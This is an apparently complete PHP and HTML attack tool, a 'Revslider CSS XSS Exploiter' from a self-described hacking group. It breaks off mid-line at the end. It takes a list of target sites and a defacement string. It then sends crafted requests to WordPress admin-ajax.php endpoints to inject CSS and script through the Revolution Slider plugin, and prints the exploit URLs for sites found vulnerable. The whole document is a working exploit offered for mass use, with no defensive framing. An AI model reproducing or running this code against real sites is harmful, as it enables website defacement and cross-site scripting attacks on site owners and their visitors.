Revslider CSS XSS Exploiter

<meta content="XPLOITER BY AZZATSSINS CYBERSERKERS OF PSYCHOPATH" name="description" />
<title>!!!- XSS & CSS | REVOLUTION SLIDER | AZZATSSINS | BN-IDBTE4M -!!!</title>
<body style='color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
<center>
<form method="GET">
<input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" value="http://target.mu" type="text" name="azzatssins"/>
<br>
<input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" value="HACKED BY AZZATSSINS" type="text" name="xcss"/>
<br>
<input style="background:dodgerblue;margin:1px;width:15%;padding:6px;color:#fff;border:0;font-weight:bold;" type="submit" value="EXECUTE" /><br>
</form>
</center>
<?php
/** AZZATSSINS **/

/************************/******************************************
azzatssinscyberserkers@gmail.com
******************************************/

function hajar($yuerel, $dataAing=null) {
    $cuih = curl_init();
    curl_setopt($cuih, CURLOPT_URL, $yuerel);
    if ($dataAing != null){
        curl_setopt($cuih, CURLOPT_POST, true);
        curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
    }
    curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
    $eks = curl_exec($cuih);
    curl_close($cuih);
    return $eks;
}

$cafc = $_GET['xcss'];
$site =  $_GET['azzatssins'];
$idbte4m = explode("\r\n", $site);
if (!isset($site)) {
} else {
    foreach ($idbte4m as $uri) {
        echo "<br>\n----------------<a [email protected]>AZZATSSINS</a>----------------";
        echo "<br>\nTarget => " . $uri;
        echo "\n";

        $azzatssinscyberserkers2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
            "action" => "revslider_ajax_action",
            "client_action" => "get_captions_css",
            "data" => $cafc)
        );
        $jasonB = json_decode($azzatssinscyberserkers2, true);
        if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
            echo "<br>\n[CSS] => <font color=red>NOT VULNERABLE</font>";
        } elseif ($jasonB['success'] == true) {
            echo "<br>\n[CSS] => <font color=lime>SUCCESS</font>";
            echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
            echo "action=revslider_ajax_action&";
            echo "client_action=get_captions_css";
            echo "data=" . urlencode($cafc) . "\n";
        }

        $azzatssinscyberserkers3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
            "action" => "revslider_ajax_action",
            "client_action" => $cafc)
        );
        $jasonC = json_decode($azzatssinscyberserkers3, true);
        if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
            echo "<br><br>\n[XSS] => <font color=lime>SUCCESS</font>";
            echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
            echo "action=revslider_ajax_action";
            echo "client_action=" . urlencode($cafc) . "\n";
        } else {
            echo "<br><br>\n[XSS] => <font color=red>NOT VULNERABLE<